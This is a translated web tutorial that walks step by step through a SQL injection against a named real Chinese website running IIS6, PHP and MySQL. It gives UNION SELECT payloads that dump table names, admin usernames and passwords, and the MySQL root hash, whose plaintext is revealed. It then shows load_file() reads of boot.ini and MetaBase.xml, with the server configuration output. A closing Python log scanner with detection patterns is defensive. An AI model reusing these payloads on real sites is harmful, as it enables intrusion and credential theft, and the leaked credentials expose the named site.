PHP/MySQL injection: using load_file() to obtain the IIS configuration file

Source: Internet
Author: User

Let's first look at an injection point:

http://www.<redacted>.cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,concat(database(),0x5c,user(),0x5c,version()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,23,24,25,26,27

The echo is: flier_dbase\root@localhost\5.0.22-community-nt

If the injection point is the first vulnerability, then the administrator letting the website connect as root is the second. Next, the tables created by the administrator:

http://www.<redacted>.cn/news_detail.php?newsid=1+union+select+1,2,3,4,5,6,GROUP_CONCAT(DISTINCT+table_name),8,9,10,11,12,13,16,17,18,19,20,21,24,25,26,27+from+information_schema.columns+where+table_schema=<hex-encoded database name>

This returns: pub_config, pub_tree, pub_webmaster, web_img, web_keys, web_ly, web_news, web_news_review

The fields of pub_webmaster:

http://www.<redacted>.cn/news_detail.php?newsid=-1+union+select+…,GROUP_CONCAT(DISTINCT+column_name),…,24,25,26,27+from+information_schema.columns+where+table_name=<hex-encoded table name>

This returns: webmasterid, username, userpwd, loginnum, ip, lasttime, tree, name, dtime, sex, jobs. Then:

http://www.<redacted>.cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,GROUP_CONCAT(DISTINCT+username,0x5f,userpwd),…,22,23,24,25,26,27+from+pub_webmaster

The third vulnerability follows. Since the admin backend address could not be found, the MySQL administrator's password was cracked instead:

http://www.<redacted>.cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,concat(user,password),8,9,10,11,12,13,16,17,18,19,20,21,24,25,26,27+from+mysql.user

This returns: root*CB26B0546CADD30FC2432C095A6A3D54FA3C2FFD

That is only a database account. If the database is not reachable from outside, would you give up? That won't do. Let's set it aside for now: even the school's distributed password-cracking system has a hard time with an eight-character password mixing letters, digits and symbols. (However, this password is a weak one of eight letters and symbols, which for now does not count as a vulnerability. *CB26B0546CADD30FC2432C095A6A3D54FA3C2FFD corresponds to qweasd in plain text.)

2. There is another way to obtain a path. The IIS6 404 page shows that the web server runs in a Windows + IIS6 + PHP + MySQL environment. First hex-encode the path c:\\boot.ini, which gives 0x633A5C5C626F6F742E696E69, and then:

http://www.<redacted>.cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,load_file(0x633A5C5C626F6F742E696E69),8,9,10,11,12,13,16,17,18,19,20,21,24,25,26,27

The echo is:

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, Enterprise" /fastdetect /NoExecute=OptOut

Although load_file can read files, this one seems useless. On IIS6, load the path c:\windows\system32\inetsrv\MetaBase.xml instead to obtain the website configuration.

*Note: For Windows file paths the backslash must be doubled; with a single backslash load_file fails. The reason is probably this: the Windows separator runs from top left to bottom right, whereas on Linux it runs from top right to bottom left. If the Windows separator is followed by t (\t), what does that mean in programming? And \n? Right, the path separator gets swallowed as an escape. With a doubled backslash, \\ stands for one real backslash, and to output a double backslash you need four: \\\\. Depressing, isn't it?

The last injection request is: http://www.fly-er.com.cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,load_file(<hex-encoded path>),8,9,10,11,12,13,16,17,18,19,20,21,24,25, and the echo is as follows:

<IIsWebServer Location="/LM/W3SVC/2125961364"
    AuthFlags="0"
    LogExtFileFlags="LogExtFileDate | LogExtFileTime | LogExtFileClientIp | LogExtFileUriStem | LogExtFileUriQuery | LogExtFileHttpStatus | LogExtFileWin32Status | LogExtFileServerPort | LogExtFileUserAgent | LogExtFileHttpSubStatus"
    LogFileDirectory="E:\flylog"
    LogFileLocaltimeRollover="FALSE"
    LogFilePeriod="1"
    LogFileTruncateSize="20971520"
    LogPluginClsid="{FF160663-DE82-11CF-BC0A-00AA006111E0}"
    ServerAutoStart="TRUE"
    ServerBindings=":80:fly-er.com.cn
        :80:www.fly-er.com.cn"
    ServerComment="fly-er.com.cn"
></IIsWebServer>

Also:
<IIsWebVirtualDir Location="/LM/W3SVC/2125961364/root"
    AccessFlags="AccessRead | AccessWrite | AccessScript"
    AppFriendlyName="Default Application"
    AppIsolated="2"
    AppRoot="/LM/W3SVC/2125961364/Root"
    AuthFlags="AuthAnonymous | AuthNTLM"
    DefaultDoc="login"
    Login="DirBrowseShowDate | DirBrowseShowTime | login | EnableDefaultDoc"
    Path="F:\web\2010716\new_flyer"
    UNCPassword="Courier"
></IIsWebVirtualDir>

Here we construct: http://www.<redacted>.cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,load_file(<hex-encoded path>),8,9,10,11,12,13,16,17,18,19,20,21,24,25,26,27 and right-click to view the page source.

*Note: When using load_file, it is best to wrap it in hex: hex(load_file(xxxxxxx)). I once met a website where I could not tell where the home page code went wrong. The injection point was on the home page, and I used it to load_file the home page file itself. Without hex wrapped around it, the home page was displayed over and over, like this: the index contained an iframe, the iframe loaded the index file, the iframe in that index file loaded the index file again, and so on until the machine's resources were exhausted. Although I do not know whether the site actually had that iframe at the time, such nesting does produce an endless loop. Therefore we recommend wrapping load_file in hex. The code in the index:

require('admin_flier/common/function.php');
require('admin_flier/lib/class/form.class.php');
require('admin_flier/lib/class/db.class.php');
require('admin_flier/lib/class/page.class.php');
include('inc/head.php');

Isn't that the admin backend path? Clearly the backend is not secure enough. Even if the backend path is hidden so that scanners cannot find it, does that mean backend security can be relaxed?
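The recovered IIsWebServer node shows that this server logs cs-uri-query (LogExtFileUriQuery) alongside the client IP and URI stem, so every request of the kind walked through above leaves a trace in the W3C log in E:\flylog. The following is an added example, not code from the original article or from the site it describes: it parses W3C extended log lines in that field order and flags the UNION/information_schema/mysql.user/load_file/hex-literal shapes of the requests quoted on the page. The log lines, addresses and times are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Field order follows the LogExtFileFlags in the recovered MetaBase.xml (Date,
# Time, ClientIp, UriStem, UriQuery, HttpStatus, Win32Status, ServerPort, UserAgent, HttpSubStatus).
FIELDS = ["date", "time", "c-ip", "cs-uri-stem", "cs-uri-query", "sc-status",
          "sc-win32-status", "s-port", "cs(User-Agent)", "sc-substatus"]

# Signatures for the steps on the page: UNION column probing, information_schema
# and mysql.user harvesting, load_file() reads, and hex literals standing in for quoted strings.
PATTERNS = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\s*\.", re.I),
    "mysql_user": re.compile(r"\bmysql\s*\.\s*user\b", re.I),
    "file_read": re.compile(r"\bload_file\s*\(", re.I),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{6,}\b", re.I),
}

def parse_w3c(line):
    """Split one W3C extended log line into a dict; None for comments or junk."""
    if line.startswith("#") or not line.strip():
        return None
    parts = line.split(" ")
    return dict(zip(FIELDS, parts)) if len(parts) == len(FIELDS) else None

def inspect_query(raw_query):
    """Decode a logged cs-uri-query and return the matching signature names."""
    # IIS stores the query URL-encoded and the payloads use '+' for spaces,
    # so decode before matching (an empty query is logged as '-').
    decoded = unquote_plus(raw_query)
    return sorted(name for name, rx in PATTERNS.items() if rx.search(decoded))

def scan(lines):
    """Return (client ip, uri stem, findings) for each suspicious request."""
    hits = []
    for rec in filter(None, map(parse_w3c, lines)):
        findings = inspect_query(rec["cs-uri-query"])
        if findings:
            hits.append((rec["c-ip"], rec["cs-uri-stem"], findings))
    return hits

# Constructed sample log (addresses and times are made up); the queries
# mirror the shapes of the injection requests quoted on the page.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-uri-stem cs-uri-query sc-status sc-win32-status s-port cs(User-Agent) sc-substatus
2010-07-16 10:00:01 203.0.113.5 /news_detail.php newsid=17 200 0 80 Mozilla/5.0 0
2010-07-16 10:00:09 203.0.113.9 /news_detail.php newsid=-1+union+select+1,2,concat(database(),0x5c,user()),4 200 0 80 Mozilla/5.0 0
2010-07-16 10:01:22 203.0.113.9 /news_detail.php newsid=-1+union+select+group_concat(table_name)+from+information_schema.columns 200 0 80 Mozilla/5.0 0
2010-07-16 10:02:40 203.0.113.9 /news_detail.php newsid=-1+union+select+hex(load_file(0x633A5C5C626F6F742E696E69)) 200 0 80 Mozilla/5.0 0
""".splitlines()
```

Running scan(SAMPLE_LOG) reports only the three requests from 203.0.113.9; a real deployment would also check that the MySQL account used by the web application lacks the FILE privilege, since load_file() returns NULL without it.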
